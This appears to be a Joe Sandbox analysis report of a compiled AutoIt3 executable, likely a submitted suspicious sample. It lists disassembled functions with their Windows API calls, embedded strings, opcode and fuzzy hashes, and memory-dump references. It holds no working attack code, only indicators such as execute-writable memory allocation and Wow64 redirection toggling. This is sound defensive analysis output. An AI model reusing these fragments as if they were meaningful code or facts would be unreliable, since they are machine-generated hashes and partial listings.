                    • Opcode ID: 30f0b98161bf9a51bdb7a0a74247530a72ee4209503bf62ee3d5b0a1d7973eb6
                    • Instruction ID: b44d871afd54a1a415244a2a61fed056fcbf4367e45fe91d74e04dd790d89bb5
                    • Opcode Fuzzy Hash: 30f0b98161bf9a51bdb7a0a74247530a72ee4209503bf62ee3d5b0a1d7973eb6
                    • Instruction Fuzzy Hash: C2F0B230004348ABDB516F6AEC0CB583BA5BB01726F54C239F469850B1E73989F5DF55
                    APIs
                      • Part of subcall function 00760FF6: std::exception::exception.LIBCMT ref: 0076102C
                      • Part of subcall function 00760FF6: __CxxThrowException@8.LIBCMT ref: 00761041
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 00747BB1: _memmove.LIBCMT ref: 00747C0B
                    • __swprintf.LIBCMT ref: 0075302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00752EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: 90d087771d6a565e69a021cc18ee072cc9365ec727f80a6e706d9452dbda5236
                    • Instruction ID: d14108c078fa36c3c3ea444beca488be01e8d0edec67541105eb4b7766233e4a
                    • Opcode Fuzzy Hash: 90d087771d6a565e69a021cc18ee072cc9365ec727f80a6e706d9452dbda5236
                    • Instruction Fuzzy Hash: 49917E71108301EFC718EF24D899CAFB7A5EF85750F04491DF9869B2A1DB68EE48CB52
                    APIs
                    • OleSetContainedObject.OLE32(?,00000001), ref: 0079B981
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ContainedObject
                    • String ID: AutoIt3GUI$Container$%}
                    • API String ID: 3565006973-3704997335
                    • Opcode ID: 5ada85c0a1cd3770461fbc2f381bc76164e8ce9917e96193329177b18c1a59c9
                    • Instruction ID: 41ebdd6687025ea6b2a6c5dafb67c96cef2eb79f0785c4ed2e8e566a6d2b494e
                    • Opcode Fuzzy Hash: 5ada85c0a1cd3770461fbc2f381bc76164e8ce9917e96193329177b18c1a59c9
                    • Instruction Fuzzy Hash: 32914970600601DFDB24DF68E984B6ABBE9FF48710F14856EF94ACB291DB74E841CB60
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 007652DD
                      • Part of subcall function 00770340: __87except.LIBCMT ref: 0077037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 2c5d2fd7a4407a987118f41a0c0be6ade83cff2f92041bf28c5d00ece650de40
                    • Instruction ID: b8fd2b333654df29e3644abbd35b0a0810e1b92ea57461dcfcf5aeaab880be4b
                    • Opcode Fuzzy Hash: 2c5d2fd7a4407a987118f41a0c0be6ade83cff2f92041bf28c5d00ece650de40
                    • Instruction Fuzzy Hash: 4B517B61A1D601CBCF157724C95137E2B94AB017D4F20C959E8CE862E6EF7C8CD4EACA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: db840527555040a938f8c99f2b79ac2fddba5c900f9da4b4d26a6294eabe1316
                    • Instruction ID: 216b0e4c742bd0679921916ec2fb52f46659220f21795d0e6de77c7770d634f0
                    • Opcode Fuzzy Hash: db840527555040a938f8c99f2b79ac2fddba5c900f9da4b4d26a6294eabe1316
                    • Instruction Fuzzy Hash: E8513375204666DFDF16DF28D8C8AFA7BA4EF19310F144059EC929B2A0D73C9C46CBA0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oau
                    • API String ID: 2620147621-3624848570
                    • Opcode ID: b477938c865ad21c675321db0468187237ebc32dd12636cecd55a11d15142a86
                    • Instruction ID: 7ec38b22f495be9472dc5332e11390965afbc06cea0b5c402b2fe897afd9c5e6
                    • Opcode Fuzzy Hash: b477938c865ad21c675321db0468187237ebc32dd12636cecd55a11d15142a86
                    • Instruction Fuzzy Hash: EF517B716083419FDB24CF28C440A6BBBE1FF85354F54492DE98A87361EB79D905CB82
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: 507ae22a5e5cca032574becbd078e424fb08f6ad46b5f4d8ee911edbfb7d48b6
                    • Instruction ID: 510f37b9be717361fc15e4136e893b47fffb954a0b842305642f5219383b9aea
                    • Opcode Fuzzy Hash: 507ae22a5e5cca032574becbd078e424fb08f6ad46b5f4d8ee911edbfb7d48b6
                    • Instruction Fuzzy Hash: B751C671900749DFDB24CF55C8857EABBF4EF04315F50856EEA4AC7240E7799698CB40
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007C76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007C76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: ff23f6bc59ef6a3b566bb972dce3b11ba4175e5ac5e7f2dcbb88a75cd341545d
                    • Instruction ID: e8dd879228fe6cb8c8d765b3c63c62a044b0531440ec6cbfa7d4183b08a922f3
                    • Opcode Fuzzy Hash: ff23f6bc59ef6a3b566bb972dce3b11ba4175e5ac5e7f2dcbb88a75cd341545d
                    • Instruction Fuzzy Hash: D2219F32600219ABDF159E64CC46FEA3B69EB48714F110218FE157B1D0DAB9A850DBA0
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C6FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 939d40a10e044723ef9eebeaf92ef94f093ee9caece06fc5a8a2183f34cd0fa0
                    • Instruction ID: f0090b3140f1b48f3345395d8166a75e0c52175ab2eaf69d0094283276ef820b
                    • Opcode Fuzzy Hash: 939d40a10e044723ef9eebeaf92ef94f093ee9caece06fc5a8a2183f34cd0fa0
                    • Instruction Fuzzy Hash: 54219F32610118BFDF119F54DC85FBB3BAAEF89764F01812CFA549B190CA79AC518BA0
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007C79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007C79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007C7A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 7ecb6e80b527c4bedd80a7f3c43268278c04a9d8154258f6d9cf4efa733165c2
                    • Instruction ID: 91a44f43a87c23cc906122117338ce813e8b1b675abaf0045dafc7461fab3725
                    • Opcode Fuzzy Hash: 7ecb6e80b527c4bedd80a7f3c43268278c04a9d8154258f6d9cf4efa733165c2
                    • Instruction Fuzzy Hash: E011E372244208BBEF189F75CC05FEB77A9EF89B64F01451DFA41A6090D675A851CB60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00744C2E), ref: 00744CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00744CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
                    • Instruction ID: 4996385eebc989d7d1d78729295fdf70bdb3a99d51acb9635df3823c211c2434
                    • Opcode Fuzzy Hash: 70040f60b4dc9a7c4bde9ff266ce44910019255dd7acdbeec4f6421fd6c36c24
                    • Instruction Fuzzy Hash: A4D017B0511727CFE7209F31EA58F16B7E7AF05791B19C83ED886DA150E778D880CA60
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00744D2E,?,00744F4F,?,008062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00744D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00744D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: d2f60140603cade18c8778cc0de3367fbf9be473bb382fc0574effee55835dd9
                    • Instruction ID: 2f4c65c5d36f91ac087eaedf567ebff79be30a7f94a7636f1c59df61a15fb26d
                    • Opcode Fuzzy Hash: d2f60140603cade18c8778cc0de3367fbf9be473bb382fc0574effee55835dd9
                    • Instruction Fuzzy Hash: C8D017B0A10717CFD7209F31D808B16B7EAAF15352B15C83ED596D6250EB78D880CE54
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00744CE1,?), ref: 00744DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00744DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: d8bae74ba40cb2cda468f45feeb53efa1afd68fc7b453eafe78599fedd55441a
                    • Instruction ID: 626778c388b10a37277df8e8c2a13d52d9568afa2ea37447a4aad7e965827f99
                    • Opcode Fuzzy Hash: d8bae74ba40cb2cda468f45feeb53efa1afd68fc7b453eafe78599fedd55441a
                    • Instruction Fuzzy Hash: BFD0C7B0A00713DFC7208F30C808B56B3E6AF04340B04C83ED8C2C2250EB78C880CA10
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,007C12C1), ref: 007C1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C1092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: e5689d799ae55db5c772b29b18b2b923f88dc386b7bd6e27a495ba7f06411ce1
                    • Instruction ID: fe321caba99a13c8bca0762d2c5223b56ca4eaceaa5df9af03cdba0241d11aa8
                    • Opcode Fuzzy Hash: e5689d799ae55db5c772b29b18b2b923f88dc386b7bd6e27a495ba7f06411ce1
                    • Instruction Fuzzy Hash: BCD01770520716CFD7209F35D818E2A77E5AF06361F19CC3EE48ADA250E778C8C0CA50
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007B9009,?,007CF910), ref: 007B9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007B9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 5359215b716006e789c20fc73db7b616e1b3666b8e60cde9b3f5860f762d20ce
                    • Instruction ID: beec7bfb8affb872f82c61935cc3b2b7baaf12bf0bfc15d6cf64d590c2a93e85
                    • Opcode Fuzzy Hash: 5359215b716006e789c20fc73db7b616e1b3666b8e60cde9b3f5860f762d20ce
                    • Instruction Fuzzy Hash: 52D0C7B050072BCFCB208F30CA08A43BBE6AF00341B24C83EE696C2650E778C880CA20
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: LocalTime__swprintf
                    • String ID: %.3d$WIN_XPe
                    • API String ID: 2070861257-2409531811
                    • Opcode ID: 67245ae0f87aadc3d8880929b89440c6a10b0030b14bde8068e5b5fa4911bf62
                    • Instruction ID: 124924daae4f1e5651bfcbe63e784703d60acaa3a39b0db425e0b8bd0bf01a35
                    • Opcode Fuzzy Hash: 67245ae0f87aadc3d8880929b89440c6a10b0030b14bde8068e5b5fa4911bf62
                    • Instruction Fuzzy Hash: F4D012F1844118EACB45AA908C44CF97B7CB704301F9005D2F90692000F33C9B86DB25
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
                    • Instruction ID: 0676dfc078d91c97339957048420849136d45924e113ee58cca9eb0a7624b4c0
                    • Opcode Fuzzy Hash: 3ac7fbf7540da9cc0a1bf6879caa3b04102716983e7f6bbe551019a9f88f573f
                    • Instruction Fuzzy Hash: 82C17D74A14216EFCF18CFA8D884EAEB7B5FF48714B118598E805EB251D734EE81DB90
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 007BE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 007BE415
                      • Part of subcall function 007BDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007BDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007BE615
                    • _memmove.LIBCMT ref: 007BE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
